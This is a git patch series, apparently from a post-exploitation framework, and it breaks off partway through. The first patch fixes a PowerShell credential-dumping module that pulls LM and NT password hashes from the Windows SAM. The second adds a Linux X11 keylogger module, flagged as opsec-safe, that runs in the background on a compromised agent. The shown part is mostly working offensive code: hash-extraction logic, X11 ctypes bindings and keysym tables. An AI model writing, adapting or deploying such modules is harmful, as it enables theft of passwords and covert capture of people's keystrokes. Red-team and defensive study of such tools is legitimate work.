From 60d835d1e05484b597f79762a64b395334107281 Mon Sep 17 00:00:00 2001 From: Piotr Marszalik Date: Thu, 14 Sep 2017 14:57:22 -0500 Subject: [PATCH 01/50] Invoke-PowerDump bug - corrupt hash fix Fixed the bug where the hashes are not being extracted correctly when LM is disabled and history is enabled. Rather than relying on length, LM and NT headers are checked. Four bytes at 0xa0 show if LM exists and four bytes at 0xac show if NT exists. Details on this known issue can be found in the following whitepaper from blackhat: https://media.blackhat.com/bh-us-12/Briefings/Reynolds/BH_US_12_Reynods_Stamp_Out_Hash_WP.pdf This same bug has been fixed in other frameworks sharing the code: https://github.com/rapid7/metasploit-framework/pull/4233 https://github.com/trustedsec/social-engineer-toolkit/pull/98 https://github.com/samratashok/nishang/pull/3 --- .../credentials/Invoke-PowerDump.ps1 | 22 ++++++++++++++++--- 1 file changed, 19 insertions(+), 3 deletions(-) diff --git a/data/module_source/credentials/Invoke-PowerDump.ps1 b/data/module_source/credentials/Invoke-PowerDump.ps1 index dec03c3..47d9dd7 100644 --- a/data/module_source/credentials/Invoke-PowerDump.ps1 +++ b/data/module_source/credentials/Invoke-PowerDump.ps1 @@ -411,14 +411,30 @@ namespace PowerDump function Get-UserHashes($u, [byte[]]$hbootkey) { [byte[]]$enc_lm_hash = $null; [byte[]]$enc_nt_hash = $null; - if ($u.HashOffset + 0x28 -lt $u.V.Length) + + # check if hashes exist (if byte memory equals to 20, then we've got a hash) + $LM_exists = $false; + $NT_exists = $false; + # LM header check + if ($u.V[0xa0..0xa3] -eq 20) + { + $LM_exists = $true; + } + # NT header check + elseif ($u.V[0xac..0xaf] -eq 20) + { + $NT_exists = $true; + } + + if ($LM_exists -eq $true) { $lm_hash_offset = $u.HashOffset + 4; $nt_hash_offset = $u.HashOffset + 8 + 0x10; $enc_lm_hash = $u.V[$($lm_hash_offset)..$($lm_hash_offset+0x0f)]; $enc_nt_hash = $u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)]; } - elseif ($u.HashOffset + 0x14 -lt $u.V.Length) + + elseif ($NT_exists -eq $true) { $nt_hash_offset = $u.HashOffset + 8; $enc_nt_hash = [byte[]]$u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)]; @@ -494,4 +510,4 @@ namespace PowerDump { Write-Error "Administrator or System privileges necessary." } -} \ No newline at end of file +} From 00b8427f9beb17aca862fb6b3b10646c54644285 Mon Sep 17 00:00:00 2001 From: Nikaiw Date: Sun, 24 Sep 2017 19:17:26 +0200 Subject: [PATCH 02/50] Fix PR (generate function signature, opsec value) --- .../python/collection/linux/xkeylogger.py | 794 ++++++++++++++++++ 1 file changed, 794 insertions(+) create mode 100644 lib/modules/python/collection/linux/xkeylogger.py diff --git a/lib/modules/python/collection/linux/xkeylogger.py b/lib/modules/python/collection/linux/xkeylogger.py new file mode 100644 index 0000000..61f3437 --- /dev/null +++ b/lib/modules/python/collection/linux/xkeylogger.py @@ -0,0 +1,794 @@ +class Module: + + def __init__(self, mainMenu, params=[]): + + # metadata info about the module, not modified during runtime + self.info = { + # name for the module that will appear in module menus + 'Name': 'Keylog', + + # list of one or more authors for the module + 'Author': ['Nikaiw'], + + # more verbose multi-line description of the module + 'Description': ("X userland keylogger based on pupy"), + + # True if the module needs to run in the background + 'Background': True, + + # File extension to save the file as + 'OutputExtension': "", + + # if the module needs administrative privileges + 'NeedsAdmin': False, + + # True if the method doesn't touch disk/is reasonably opsec safe + 'OpsecSafe': True, + + # the module language + 'Language' : 'python', + + # the minimum language version needed + 'MinLanguageVersion' : '2.6', + + # list of any references/other comments + 'Comments': [ + "WIP, might miss some keys, can't kill agent sometimes" + ] + } + + # any options needed by the module, settable during runtime + self.options = { + # format: + # value_name : {description, required, default_value} + 'Agent': { + # The 'Agent' option is the only one that MUST be in a module + 'Description' : 'Agent to keylog.', + 'Required' : True, + 'Value' : '' + }, + } + + # save off a copy of the mainMenu object to access external functionality + # like listeners/agent handlers/etc. + self.mainMenu = mainMenu + + # During instantiation, any settable option parameters + # are passed as an object set to the module and the + # options dictionary is automatically set. This is mostly + # in case options are passed on the command line + if params: + for param in params: + # parameter format is [Name, Value] + option, value = param + if option in self.options: + self.options[option]['Value'] = value + + def generate(self, obfuscate=False, obfuscationCommand=""): + + script = """# -*- coding: utf-8 -*- +# inspired from https://github.com/amoffat/pykeylogger +import sys +from time import sleep, time, strftime +import ctypes as ct +from ctypes.util import find_library + +try: + x11 = ct.cdll.LoadLibrary(find_library('X11')) + + x11.XkbOpenDisplay.restype = ct.c_void_p + x11.XkbOpenDisplay.argtypes = [ + ct.c_char_p, + ct.c_void_p, ct.c_void_p, ct.c_void_p, ct.c_void_p, ct.c_void_p + ] + x11.XCloseDisplay.argtypes = [ ct.c_void_p ] + x11.XQueryKeymap.restype = ct.c_int + x11.XQueryKeymap.argtypes = [ ct.c_void_p, ct.c_void_p ] + x11.XGetInputFocus.restype = ct.c_int + x11.XGetInputFocus.argtypes = [ ct.c_void_p, ct.c_void_p, ct.c_void_p ] + x11.XInternAtom.restype = ct.c_ulong + x11.XInternAtom.argtypes = [ ct.c_void_p, ct.c_char_p, ct.c_byte] + x11.XGetWMName.restype = ct.c_int + x11.XGetWMName.argtypes = [ct.c_void_p, ct.c_ulong, ct.c_void_p] + x11.XQueryTree.restype = ct.c_int + x11.XQueryTree.argtypes = [ct.c_void_p, ct.c_ulong, ct.c_void_p, ct.c_void_p, ct.POINTER(ct.c_ulong), ct.POINTER(ct.c_uint)] + x11.XGetClassHint.restype = ct.c_int + x11.XGetClassHint.argtypes = [ ct.c_void_p, ct.c_ulong, ct.c_void_p ] + x11.XkbGetKeyboard.restype = ct.c_void_p + x11.XkbGetKeyboard.argtypes = [ ct.c_void_p, ct.c_uint, ct.c_uint ] + x11.XkbGetState.argtypes = [ ct.c_void_p, ct.c_uint, ct.c_void_p ] + x11.XKeycodeToKeysym.restype = ct.c_uint + x11.XKeycodeToKeysym.argtypes = [ ct.c_void_p, ct.c_uint ] + x11.XkbKeycodeToKeysym.restype = ct.c_uint + x11.XkbKeycodeToKeysym.argtypes = [ ct.c_void_p, ct.c_uint ] + x11.XDefaultRootWindow.restype = ct.c_ulong + x11.XDefaultRootWindow.argtypes = [ ct.c_void_p ] + x11.XNextEvent.argtypes = [ ct.c_void_p, ct.c_void_p ] + x11.XMapWindow.argtypes = [ ct.c_void_p, ct.c_ulong ] + x11.XSync.argtypes = [ ct.c_void_p, ct.c_int ] + x11.XMaskEvent.argtypes = [ ct.c_void_p, ct.c_ulong, ct.c_void_p ] + x11.XSelectInput.argtypes = [ ct.c_void_p, ct.c_uint, ct.c_long ] + x11.XDestroyWindow.argtypes = [ ct.c_void_p, ct.c_ulong ] + x11.XGetEventData.argtypes = [ ct.c_void_p, ct.c_void_p ] + x11.XFreeEventData.argtypes = [ ct.c_void_p, ct.c_void_p ] + x11.XQueryExtension.argtypes = [ ct.c_void_p, ct.c_char_p, ct.c_void_p, ct.c_void_p, ct.c_void_p ] + x11.XGetWindowProperty.argtypes = [ ct.c_void_p, ct.c_ulong, ct.c_ulong, ct.c_long, ct.c_long, ct.c_int, + ct.c_ulong, ct.c_void_p, ct.c_void_p, ct.c_void_p, ct.c_void_p, ct.POINTER(ct.c_char_p)] + x11.XGetWindowProperty.restype = ct.c_int +except: + x11 = None + +try: + xi = ct.cdll.LoadLibrary(find_library('Xi')) + xi.XOpenDevice.restype = ct.c_void_p + xi.XOpenDevice.argtypes = [ ct.c_void_p, ct.c_uint ] + xi.XCloseDevice.argtypes = [ ct.c_void_p, ct.c_void_p ] + xi.XISelectEvents.argtypes = [ ct.c_void_p, ct.c_uint, ct.c_void_p, ct.c_int ] +except: + xi = None + + + +class ClassHint(ct.Structure): + _fields_ = [ + ( "name", ct.c_char_p ), + ( "klass", ct.c_char_p ) + ] + +class XkbState(ct.Structure): + _fields_ = [ + ( "group", ct.c_char ), + ( "locked_group", ct.c_char ), + ( "base_group", ct.c_char ), + ( "latched_group", ct.c_char ), + ( "mods", ct.c_char ), + ( "base_mods", ct.c_char ), + ( "latched_mods", ct.c_char ), + ( "locked_mods", ct.c_char ), + ( "compat_state", ct.c_char ), + ( "grab_mods", ct.c_char ), + ( "compat_grab_mods", ct.c_char ), + ( "lookup_mods", ct.c_char ), + ( "compat_lookup_mods", ct.c_char ), + ( "ptr_buttons", ct.c_char ) + ] + +class XiEventMask(ct.Structure): + _fields_ = [ + ( "deviceid", ct.c_int ), + ( "mask_len", ct.c_int ), + ( "mask", ct.c_void_p ) + ] + +class XGenericEventCookie(ct.Structure): + _fields_ = [ + ( "type", ct.c_int ), + ( "serial", ct.c_ulong ), + ( "send_event", ct.c_int ), + ( "display", ct.c_void_p ), + ( "extension", ct.c_int ), + ( "evtype", ct.c_int ), + ( "cookie", ct.c_uint ), + ( "data", ct.c_void_p ) + ] + +class XEventType(ct.Structure): + _fields_ = [ + ( "type", ct.c_int ), + ( "pad", ct.c_long * 24 ) + ] + +class XEvent(ct.Union): + _fields_ = [ + ( "type", XEventType ), + ( "cookie", XGenericEventCookie ), + ] + +class XIValuatorState(ct.Structure): + _fields_ = [ + ( "mask_len", ct.c_int ), + ( "mask", ct.c_void_p ), + ( "values", ct.c_void_p ), + ] + +class XIButtonState(ct.Structure): + _fields_ = [ + ( "mask_len", ct.c_int ), + ( "mask", ct.c_void_p ) + ] + +class XIModifierState(ct.Structure): + _fields_ = [ + ( "base", ct.c_int ), + ( "latched", ct.c_int ), + ( "locked", ct.c_int ), + ( "effective", ct.c_int ), + ] + +class XIDeviceEvent(ct.Structure): + _fields_ = [ + ( "type", ct.c_int ), + ( "serial", ct.c_ulong ), + ( "send_event", ct.c_int ), + ( "display", ct.c_void_p ), + ( "extension", ct.c_int ), + ( "evtype", ct.c_int ), + ( "time", ct.c_ulong ), + ( "deviceid", ct.c_int ), + ( "sourceid", ct.c_int ), + ( "detail", ct.c_int ), + ( "root", ct.c_ulong), + ( "event", ct.c_ulong ), + ( "child", ct.c_ulong ), + ( "root_x", ct.c_double ), + ( "root_y", ct.c_double ), + ( "event_x", ct.c_double ), + ( "event_y", ct.c_double ), + ( "flags", ct.c_int ), + ( "buttons" , XIButtonState ), + ( "valuators", XIValuatorState ), + ( "mods", XIModifierState ), + ( "group", XIModifierState ), + ] + +class XTextProperty(ct.Structure): + _fields_ = [("value" , ct.c_char_p), + ("encoding" , ct.c_ulong), + ("format" , ct.c_int), + ("nitems" , ct.c_ulong)] + +def XiMaxLen(): + return (((27) >> 3) + 1) + +def XiSetMask(mask, event): + mask[(event)>>3] |= (1 << ((event) & 7)) + +def keysym_to_XK(ks): + return { + 0xff08: "BackSpace", 0xff09: "Tab", 0xff0a: "Linefeed", 0xff0b: "Clear", + 0xff0d: "Return", 0xff13: "Pause", 0xff14: "Scroll_Lock", 0xff15: "Sys_Req", + 0xff1b: "Escape", 0xffff: "Delete", 0xff20: "Multi_key", 0xff37: "Codeinput", + 0xff3c: "SingleCandidate", 0xff3d: "MultipleCandidate", 0xff3e: "PreviousCandidate", 0xff21: "Kanji", + 0xff22: "Muhenkan", 0xff23: "Henkan_Mode", 0xff23: "Henkan", 0xff24: "Romaji", + 0xff25: "Hiragana", 0xff26: "Katakana", 0xff27: "Hiragana_Katakana", 0xff28: "Zenkaku", + 0xff29: "Hankaku", 0xff2a: "Zenkaku_Hankaku", 0xff2b: "Touroku", 0xff2c: "Massyo", + 0xff2d: "Kana_Lock", 0xff2e: "Kana_Shift", 0xff2f: "Eisu_Shift", 0xff30: "Eisu_toggle", + 0xff37: "Kanji_Bangou", 0xff3d: "Zen_Koho", 0xff3e: "Mae_Koho", 0xff50: "Home", + 0xff51: "Left", 0xff52: "Up", 0xff53: "Right", 0xff54: "Down", + 0xff55: "Prior", 0xff55: "Page_Up", 0xff56: "Next", 0xff56: "Page_Down", + 0xff57: "End", 0xff58: "Begin", 0xff60: "Select", 0xff61: "Print", + 0xff62: "Execute", 0xff63: "Insert", 0xff65: "Undo", 0xff66: "Redo", + 0xff67: "Menu", 0xff68: "Find", 0xff69: "Cancel", 0xff6a: "Help", + 0xff6b: "Break", 0xff7e: "Mode_switch", 0xff7e: "script_switch", 0xff7f: "Num_Lock", + 0xff80: "KP_Space", 0xff89: "KP_Tab", 0xff8d: "KP_Enter", 0xff91: "KP_F1", + 0xff92: "KP_F2", 0xff93: "KP_F3", 0xff94: "KP_F4", 0xff95: "KP_Home", + 0xff96: "KP_Left", 0xff97: "KP_Up", 0xff98: "KP_Right", 0xff99: "KP_Down", + 0xff9a: "KP_Prior", 0xff9a: "KP_Page_Up", 0xff9b: "KP_Next", 0xff9b: "KP_Page_Down", + 0xff9c: "KP_End", 0xff9d: "KP_Begin", 0xff9e: "KP_Insert", 0xff9f: "KP_Delete", + 0xffbd: "KP_Equal", 0xffaa: "KP_Multiply", 0xffab: "KP_Add", 0xffac: "KP_Separator", + 0xffad: "KP_Subtract", 0xffae: "KP_Decimal", 0xffaf: "KP_Divide", 0xffb0: "KP_0", + 0xffb1: "KP_1", 0xffb2: "KP_2", 0xffb3: "KP_3", 0xffb4: "KP_4", + 0xffb5: "KP_5", 0xffb6: "KP_6", 0xffb7: "KP_7", 0xffb8: "KP_8", + 0xffb9: "KP_9", 0xffbe: "F1", 0xffbf: "F2", 0xffc0: "F3", + 0xffc1: "F4", 0xffc2: "F5", 0xffc3: "F6", 0xffc4: "F7", + 0xffc5: "F8", 0xffc6: "F9", 0xffc7: "F10", 0xffc8: "F11", + 0xffc8: "L1", 0xffc9: "F12", 0xffc9: "L2", 0xffca: "F13", + 0xffca: "L3", 0xffcb: "F14", 0xffcb: "L4", 0xffcc: "F15", + 0xffcc: "L5", 0xffcd: "F16", 0xffcd: "L6", 0xffce: "F17", + 0xffce: "L7", 0xffcf: "F18", 0xffcf: "L8", 0xffd0: "F19", + 0xffd0: "L9", 0xffd1: "F20", 0xffd1: "L10", 0xffd2: "F21", + 0xffd2: "R1", 0xffd3: "F22", 0xffd3: "R2", 0xffd4: "F23", + 0xffd4: "R3", 0xffd5: "F24", 0xffd5: "R4", 0xffd6: "F25", + 0xffd6: "R5", 0xffd7: "F26", 0xffd7: "R6", 0xffd8: "F27", + 0xffd8: "R7", 0xffd9: "F28", 0xffd9: "R8", 0xffda: "F29", + 0xffda: "R9", 0xffdb: "F30", 0xffdb: "R10", 0xffdc: "F31", + 0xffdc: "R11", 0xffdd: "F32", 0xffdd: "R12", 0xffde: "F33", + 0xffde: "R13", 0xffdf: "F34", 0xffdf: "R14", 0xffe0: "F35", + 0xffe0: "R15", 0xffe1: "Shift_L", 0xffe2: "Shift_R", 0xffe3: "Control_L", + 0xffe4: "Control_R", 0xffe5: "Caps_Lock", 0xffe6: "Shift_Lock", 0xffe7: "Meta_L", + 0xffe8: "Meta_R", 0xffe9: "Alt_L", 0xffea: "Alt_R", 0xffeb: "Super_L", + 0xffec: "Super_R", 0xffed: "Hyper_L", 0xffee: "Hyper_R", 0xff7e: "ISO_Group_Shift", + 0xff7e: "kana_switch", 0xff7e: "Arabic_switch", 0xff7e: "Greek_switch", 0xff7e: "Hebrew_switch", + 0xff31: "Hangul", 0xff32: "Hangul_Start", 0xff33: "Hangul_End", 0xff34: "Hangul_Hanja", + 0xff35: "Hangul_Jamo", 0xff36: "Hangul_Romaja", 0xff37: "Hangul_Codeinput", 0xff38: "Hangul_Jeonja", + 0xff39: "Hangul_Banja", 0xff3a: "Hangul_PreHanja", 0xff3b: "Hangul_PostHanja", + 0xff3c: "Hangul_SingleCandidate", 0xff3d: "Hangul_MultipleCandidate", + 0xff3e: "Hangul_PreviousCandidate", 0xff3f: "Hangul_Special", + 0xff7e: "Hangul_switch", 0xfff1: "braille_dot_1", 0xfff2: "braille_dot_2", 0xfff3: "braille_dot_3", + 0xfff4: "braille_dot_4", 0xfff5: "braille_dot_5", 0xfff6: "braille_dot_6", 0xfff7: "braille_dot_7", + 0xfff8: "braille_dot_8", 0xfff9: "braille_dot_9", 0xfffa: "braille_dot_10" + }.get(ks) + +def keysym_to_unicode(ks): + # https://raw.githubusercontent.com/substack/node-keysym/master/data/keysyms.txt + return { + 0x0020: u'\\u0020', 0x0021: u'\\u0021', 0x0022: u'\\u0022', 0x0023: u'\\u0023', 0x0024: u'\\u0024', + 0x0025: u'\\u0025', 0x0026: u'\\u0026', 0x0027: u'\\u0027', 0x0027: u'\\u0027', 0x0028: u'\\u0028', + 0x0029: u'\\u0029', 0x002a: u'\\u002a', 0x002b: u'\\u002b', 0x002c: u'\\u002c', 0x002d: u'\\u002d', + 0x002e: u'\\u002e', 0x002f: u'\\u002f', 0x0030: u'\\u0030', 0x0031: u'\\u0031', 0x0032: u'\\u0032', + 0x0033: u'\\u0033', 0x0034: u'\\u0034', 0x0035: u'\\u0035', 0x0036: u'\\u0036', 0x0037: u'\\u0037', + 0x0038: u'\\u0038', 0x0039: u'\\u0039', 0x003a: u'\\u003a', 0x003b: u'\\u003b', 0x003c: u'\\u003c', + 0x003d: u'\\u003d', 0x003e: u'\\u003e', 0x003f: u'\\u003f', 0x0040: u'\\u0040', 0x0041: u'\\u0041', + 0x0042: u'\\u0042', 0x0043: u'\\u0043', 0x0044: u'\\u0044', 0x0045: u'\\u0045', 0x0046: u'\\u0046', + 0x0047: u'\\u0047', 0x0048: u'\\u0048', 0x0049: u'\\u0049', 0x004a: u'\\u004a', 0x004b: u'\\u004b', + 0x004c: u'\\u004c', 0x004d: u'\\u004d', 0x004e: u'\\u004e', 0x004f: u'\\u004f', 0x0050: u'\\u0050', + 0x0051: u'\\u0051', 0x0052: u'\\u0052', 0x0053: u'\\u0053', 0x0054: u'\\u0054', 0x0055: u'\\u0055', + 0x0056: u'\\u0056', 0x0057: u'\\u0057', 0x0058: u'\\u0058', 0x0059: u'\\u0059', 0x005a: u'\\u005a', + 0x005b: u'\\u005b', 0x005c: u'\\u005c', 0x005d: u'\\u005d', 0x005e: u'\\u005e', 0x005f: u'\\u005f', + 0x0060: u'\\u0060', 0x0060: u'\\u0060', 0x0061: u'\\u0061', 0x0062: u'\\u0062', 0x0063: u'\\u0063', + 0x0064: u'\\u0064', 0x0065: u'\\u0065', 0x0066: u'\\u0066', 0x0067: u'\\u0067', 0x0068: u'\\u0068', + 0x0069: u'\\u0069', 0x006a: u'\\u006a', 0x006b: u'\\u006b', 0x006c: u'\\u006c', 0x006d: u'\\u006d', + 0x006e: u'\\u006e', 0x006f: u'\\u006f', 0x0070: u'\\u0070', 0x0071: u'\\u0071', 0x0072: u'\\u0072', + 0x0073: u'\\u0073', 0x0074: u'\\u0074', 0x0075: u'\\u0075', 0x0076: u'\\u0076', 0x0077: u'\\u0077', + 0x0078: u'\\u0078', 0x0079: u'\\u0079', 0x007a: u'\\u007a', 0x007b: u'\\u007b', 0x007c: u'\\u007c', + 0x007d: u'\\u007d', 0x007e: u'\\u007e', 0x00a0: u'\\u00a0', 0x00a1: u'\\u00a1', 0x00a2: u'\\u00a2', + 0x00a3: u'\\u00a3', 0x00a4: u'\\u00a4', 0x00a5: u'\\u00a5', 0x00a6: u'\\u00a6', 0x00a7: u'\\u00a7', + 0x00a8: u'\\u00a8', 0x00a9: u'\\u00a9', 0x00aa: u'\\u00aa', 0x00ab: u'\\u00ab', 0x00ac: u'\\u00ac', + 0x00ad: u'\\u00ad', 0x00ae: u'\\u00ae', 0x00af: u'\\u00af', 0x00b0: u'\\u00b0', 0x00b1: u'\\u00b1', + 0x00b2: u'\\u00b2', 0x00b3: u'\\u00b3', 0x00b4: u'\\u00b4', 0x00b5: u'\\u00b5', 0x00b6: u'\\u00b6', + 0x00b7: u'\\u00b7', 0x00b8: u'\\u00b8', 0x00b9: u'\\u00b9', 0x00ba: u'\\u00ba', 0x00bb: u'\\u00bb', + 0x00bc: u'\\u00bc', 0x00bd: u'\\u00bd', 0x00be: u'\\u00be', 0x00bf: u'\\u00bf', 0x00c0: u'\\u00c0', + 0x00c1: u'\\u00c1', 0x00c2: u'\\u00c2', 0x00c3: u'\\u00c3', 0x00c4: u'\\u00c4', 0x00c5: u'\\u00c5', + 0x00c6: u'\\u00c6', 0x00c7: u'\\u00c7', 0x00c8: u'\\u00c8', 0x00c9: u'\\u00c9', 0x00ca: u'\\u00ca', + 0x00cb: u'\\u00cb', 0x00cc: u'\\u00cc', 0x00cd: u'\\u00cd', 0x00ce: u'\\u00ce', 0x00cf: u'\\u00cf', + 0x00d0: u'\\u00d0', 0x00d0: u'\\u00d0', 0x00d1: u'\\u00d1', 0x00d2: u'\\u00d2', 0x00d3: u'\\u00d3', + 0x00d4: u'\\u00d4', 0x00d5: u'\\u00d5', 0x00d6: u'\\u00d6', 0x00d7: u'\\u00d7', 0x00d8: u'\\u00d8', + 0x00d9: u'\\u00d9', 0x00da: u'\\u00da', 0x00db: u'\\u00db', 0x00dc: u'\\u00dc', 0x00dd: u'\\u00dd', + 0x00de: u'\\u00de', 0x00de: u'\\u00de', 0x00df: u'\\u00df', 0x00e0: u'\\u00e0', 0x00e1: u'\\u00e1', + 0x00e2: u'\\u00e2', 0x00e3: u'\\u00e3', 0x00e4: u'\\u00e4', 0x00e5: u'\\u00e5', 0x00e6: u'\\u00e6', + 0x00e7: u'\\u00e7', 0x00e8: u'\\u00e8', 0x00e9: u'\\u00e9', 0x00ea: u'\\u00ea', 0x00eb: u'\\u00eb', + 0x00ec: u'\\u00ec', 0x00ed: u'\\u00ed', 0x00ee: u'\\u00ee', 0x00ef: u'\\u00ef', 0x00f0: u'\\u00f0', + 0x00f1: u'\\u00f1', 0x00f2: u'\\u00f2', 0x00f3: u'\\u00f3', 0x00f4: u'\\u00f4', 0x00f5: u'\\u00f5', + 0x00f6: u'\\u00f6', 0x00f7: u'\\u00f7', 0x00f8: u'\\u00f8', 0x00f9: u'\\u00f9', 0x00fa: u'\\u00fa', + 0x00fb: u'\\u00fb', 0x00fc: u'\\u00fc', 0x00fd: u'\\u00fd', 0x00fe: u'\\u00fe', 0x00ff: u'\\u00ff', + 0x01a1: u'\\u0104', 0x01a2: u'\\u02d8', 0x01a3: u'\\u0141', 0x01a5: u'\\u013d', 0x01a6: u'\\u015a', + 0x01a9: u'\\u0160', 0x01aa: u'\\u015e', 0x01ab: u'\\u0164', 0x01ac: u'\\u0179', 0x01ae: u'\\u017d', + 0x01af: u'\\u017b', 0x01b1: u'\\u0105', 0x01b2: u'\\u02db', 0x01b3: u'\\u0142', 0x01b5: u'\\u013e', + 0x01b6: u'\\u015b', 0x01b7: u'\\u02c7', 0x01b9: u'\\u0161', 0x01ba: u'\\u015f', 0x01bb: u'\\u0165', + 0x01bc: u'\\u017a', 0x01bd: u'\\u02dd', 0x01be: u'\\u017e', 0x01bf: u'\\u017c', 0x01c0: u'\\u0154', + 0x01c3: u'\\u0102', 0x01c5: u'\\u0139', 0x01c6: u'\\u0106', 0x01c8: u'\\u010c', 0x01ca: u'\\u0118', + 0x01cc: u'\\u011a', 0x01cf: u'\\u010e', 0x01d0: u'\\u0110', 0x01d1: u'\\u0143', 0x01d2: u'\\u0147', + 0x01d5: u'\\u0150', 0x01d8: u'\\u0158', 0x01d9: u'\\u016e', 0x01db: u'\\u0170', 0x01de: u'\\u0162', + 0x01e0: u'\\u0155', 0x01e3: u'\\u0103', 0x01e5: u'\\u013a', 0x01e6: u'\\u0107', 0x01e8: u'\\u010d', + 0x01ea: u'\\u0119', 0x01ec: u'\\u011b', 0x01ef: u'\\u010f', 0x01f0: u'\\u0111', 0x01f1: u'\\u0144', + 0x01f2: u'\\u0148', 0x01f5: u'\\u0151', 0x01f8: u'\\u0159', 0x01f9: u'\\u016f', 0x01fb: u'\\u0171', + 0x01fe: u'\\u0163', 0x01ff: u'\\u02d9', 0x02a1: u'\\u0126', 0x02a6: u'\\u0124', 0x02a9: u'\\u0130', + 0x02ab: u'\\u011e', 0x02ac: u'\\u0134', 0x02b1: u'\\u0127', 0x02b6: u'\\u0125', 0x02b9: u'\\u0131', + 0x02bb: u'\\u011f', 0x02bc: u'\\u0135', 0x02c5: u'\\u010a', 0x02c6: u'\\u0108', 0x02d5: u'\\u0120', + 0x02d8: u'\\u011c', 0x02dd: u'\\u016c', 0x02de: u'\\u015c', 0x02e5: u'\\u010b', 0x02e6: u'\\u0109', + 0x02f5: u'\\u0121', 0x02f8: u'\\u011d', 0x02fd: u'\\u016d', 0x02fe: u'\\u015d', 0x03a2: u'\\u0138', + 0x03a3: u'\\u0156', 0x03a5: u'\\u0128', 0x03a6: u'\\u013b', 0x03aa: u'\\u0112', 0x03ab: u'\\u0122', + 0x03ac: u'\\u0166', 0x03b3: u'\\u0157', 0x03b5: u'\\u0129', 0x03b6: u'\\u013c', 0x03ba: u'\\u0113', + 0x03bb: u'\\u0123', 0x03bc: u'\\u0167', 0x03bd: u'\\u014a', 0x03bf: u'\\u014b', 0x03c0: u'\\u0100', + 0x03c7: u'\\u012e', 0x03cc: u'\\u0116', 0x03cf: u'\\u012a', 0x03d1: u'\\u0145', 0x03d2: u'\\u014c', + 0x03d3: u'\\u0136', 0x03d9: u'\\u0172', 0x03dd: u'\\u0168', 0x03de: u'\\u016a', 0x03e0: u'\\u0101', + 0x03e7: u'\\u012f', 0x03ec: u'\\u0117', 0x03ef: u'\\u012b', 0x03f1: u'\\u0146', 0x03f2: u'\\u014d', + 0x03f3: u'\\u0137', 0x03f9: u'\\u0173', 0x03fd: u'\\u0169', 0x03fe: u'\\u016b', 0x047e: u'\\u203e', + 0x04a1: u'\\u3002', 0x04a2: u'\\u300c', 0x04a3: u'\\u300d', 0x04a4: u'\\u3001', 0x04a5: u'\\u30fb', + 0x04a6: u'\\u30f2', 0x04a7: u'\\u30a1', 0x04a8: u'\\u30a3', 0x04a9: u'\\u30a5', 0x04aa: u'\\u30a7', + 0x04ab: u'\\u30a9', 0x04ac: u'\\u30e3', 0x04ad: u'\\u30e5', 0x04ae: u'\\u30e7', 0x04af: u'\\u30c3', + 0x04b0: u'\\u30fc', 0x04b1: u'\\u30a2', 0x04b2: u'\\u30a4', 0x04b3: u'\\u30a6', 0x04b4: u'\\u30a8', + 0x04b5: u'\\u30aa', 0x04b6: u'\\u30ab', 0x04b7: u'\\u30ad', 0x04b8: u'\\u30af', 0x04b9: u'\\u30b1', + 0x04ba: u'\\u30b3', 0x04bb: u'\\u30b5', 0x04bc: u'\\u30b7', 0x04bd: u'\\u30b9', 0x04be: u'\\u30bb', + 0x04bf: u'\\u30bd', 0x04c0: u'\\u30bf', 0x04c1: u'\\u30c1', 0x04c2: u'\\u30c4', 0x04c3: u'\\u30c6', + 0x04c4: u'\\u30c8', 0x04c5: u'\\u30ca', 0x04c6: u'\\u30cb', 0x04c7: u'\\u30cc', 0x04c8: u'\\u30cd', + 0x04c9: u'\\u30ce', 0x04ca: u'\\u30cf', 0x04cb: u'\\u30d2', 0x04cc: u'\\u30d5', 0x04cd: u'\\u30d8', + 0x04ce: u'\\u30db', 0x04cf: u'\\u30de', 0x04d0: u'\\u30df', 0x04d1: u'\\u30e0', 0x04d2: u'\\u30e1', + 0x04d3: u'\\u30e2', 0x04d4: u'\\u30e4', 0x04d5: u'\\u30e6', 0x04d6: u'\\u30e8', 0x04d7: u'\\u30e9', + 0x04d8: u'\\u30ea', 0x04d9: u'\\u30eb', 0x04da: u'\\u30ec', 0x04db: u'\\u30ed', 0x04dc: u'\\u30ef', + 0x04dd: u'\\u30f3', 0x04de: u'\\u309b', 0x04df: u'\\u309c', 0x05ac: u'\\u060c', 0x05bb: u'\\u061b', + 0x05bf: u'\\u061f', 0x05c1: u'\\u0621', 0x05c2: u'\\u0622', 0x05c3: u'\\u0623', 0x05c4: u'\\u0624', + 0x05c5: u'\\u0625', 0x05c6: u'\\u0626', 0x05c7: u'\\u0627', 0x05c8: u'\\u0628', 0x05c9: u'\\u0629', + 0x05ca: u'\\u062a', 0x05cb: u'\\u062b', 0x05cc: u'\\u062c', 0x05cd: u'\\u062d', 0x05ce: u'\\u062e', + 0x05cf: u'\\u062f', 0x05d0: u'\\u0630', 0x05d1: u'\\u0631', 0x05d2: u'\\u0632', 0x05d3: u'\\u0633', + 0x05d4: u'\\u0634', 0x05d5: u'\\u0635', 0x05d6: u'\\u0636', 0x05d7: u'\\u0637', 0x05d8: u'\\u0638', + 0x05d9: u'\\u0639', 0x05da: u'\\u063a', 0x05e0: u'\\u0640', 0x05e1: u'\\u0641', 0x05e2: u'\\u0642', + 0x05e3: u'\\u0643', 0x05e4: u'\\u0644', 0x05e5: u'\\u0645', 0x05e6: u'\\u0646', 0x05e7: u'\\u0647', + 0x05e8: u'\\u0648', 0x05e9: u'\\u0649', 0x05ea: u'\\u064a', 0x05eb: u'\\u064b', 0x05ec: u'\\u064c', + 0x05ed: u'\\u064d', 0x05ee: u'\\u064e', 0x05ef: u'\\u064f', 0x05f0: u'\\u0650', 0x05f1: u'\\u0651', + 0x05f2: u'\\u0652', 0x06a1: u'\\u0452', 0x06a2: u'\\u0453', 0x06a3: u'\\u0451', 0x06a4: u'\\u0454', + 0x06a5: u'\\u0455', 0x06a6: u'\\u0456', 0x06a7: u'\\u0457', 0x06a8: u'\\u0458', 0x06a9: u'\\u0459', + 0x06aa: u'\\u045a', 0x06ab: u'\\u045b', 0x06ac: u'\\u045c', 0x06ae: u'\\u045e', 0x06af: u'\\u045f', + 0x06b0: u'\\u2116', 0x06b1: u'\\u0402', 0x06b2: u'\\u0403', 0x06b3: u'\\u0401', 0x06b4: u'\\u0404', + 0x06b5: u'\\u0405', 0x06b6: u'\\u0406', 0x06b7: u'\\u0407', 0x06b8: u'\\u0408', 0x06b9: u'\\u0409', + 0x06ba: u'\\u040a', 0x06bb: u'\\u040b', 0x06bc: u'\\u040c', 0x06be: u'\\u040e', 0x06bf: u'\\u040f', + 0x06c0: 